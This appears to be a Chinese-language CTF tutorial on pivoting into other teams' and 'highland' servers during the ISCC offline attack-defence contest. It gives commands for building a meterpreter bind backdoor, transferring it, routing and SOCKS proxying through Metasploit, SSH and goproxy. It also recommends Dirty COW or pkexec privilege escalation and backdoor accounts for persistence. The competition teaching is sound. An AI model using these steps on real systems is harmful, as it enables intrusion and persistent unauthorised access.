ISCC线下如何配置代理攻击其他私地及高地
字数 904 2025-08-30 06:50:28
ISCC线下赛代理配置与内网攻击技术指南
前言
本文档详细讲解在ISCC线下赛中如何配置代理攻击其他私地及高地的技术方法。针对比赛中常见的"有exp但无法攻击得分"的情况,提供完整的解决方案。
网络环境分析
典型ISCC线下赛网络拓扑包含以下机器:
- Windows(宿主机): 192.168.10.5
- kali(代理机/攻击机):
- 192.168.138.133
- 192.168.222.130
- Ubuntu(私地):
- 192.168.222.132
- 192.168.234.132
- Ubuntu(其他私地/高地): 192.168.234.134
网络限制条件:
- 本机可直接访问私地,但不能直接访问其他私地和高地
- 私地服务器不能回连攻击机
- 所有私地服务器在同一C段(可先扫描存活主机)
- 高地服务器不与私地在同一网段
- 自己的两个私地服务器可互相访问
攻击流程详解
1. MSF生成后门
由于私地不能回连攻击机,需生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=6677 -f elf > msf
2. 后门传输到私地
Web服务器传输方法:
- 直接上传文件
- 使用wget/curl下载
Pwn服务器传输方法(只有/bin/sh):
- 先建立完整shell终端:
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 使用echo写入文件(大文件需分块):
cat msf | base64 > 1.txt # 将文件base64编码
echo "base64内容" > file # 写入文件
base64 -d file > msf # 解码还原文件
- 使用nc传输:
# 接收端
nc -l -p 1234 > msf
# 发送端
nc -w 3 [目标IP] 1234 < msf
3. MSF上线与代理配置
- 启动handler:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set LPORT 6677
set RHOST 192.168.222.132 # 私地地址
run
- 进程迁移(提高稳定性):
ps
migrate [PID] # 选择系统进程注入
- 添加路由表:
run post/multi/manage/autoroute
run autoroute -p # 查看路由表
- 配置SOCKS代理:
use auxiliary/server/socks_proxy
set session 1
set SRVPORT 1080
set VERSION 5
run
- 宿主机使用Proxifier连接kali的1080端口
4. 访问其他网段机器
配置完成后,可通过代理访问其他私地和高地服务器(如192.168.234.0/24网段)
替代方法
SSH端口转发
ssh -D 1080 user@[跳板机IP]
使用goproxy工具
# 上传goproxy到目标机器
./goproxy -S :1080
注意事项
提权建议
- Ubuntu 16.04可使用脏牛漏洞提权
- CVE-2021-4034 (pkexec漏洞)也可尝试
- 提前准备离线提权工具
连接稳定性
- 创建后门用户防止session丢失
- 部署通防保护自身环境
- 多建立几个备用session
其他技巧
- 先扫描整个内网存活主机
- 保持多个访问途径
- 重要操作前备份环境
通过以上方法,可以有效解决ISCC线下赛中"有exp但无法攻击"的问题,实现对其他私地和高地的攻击。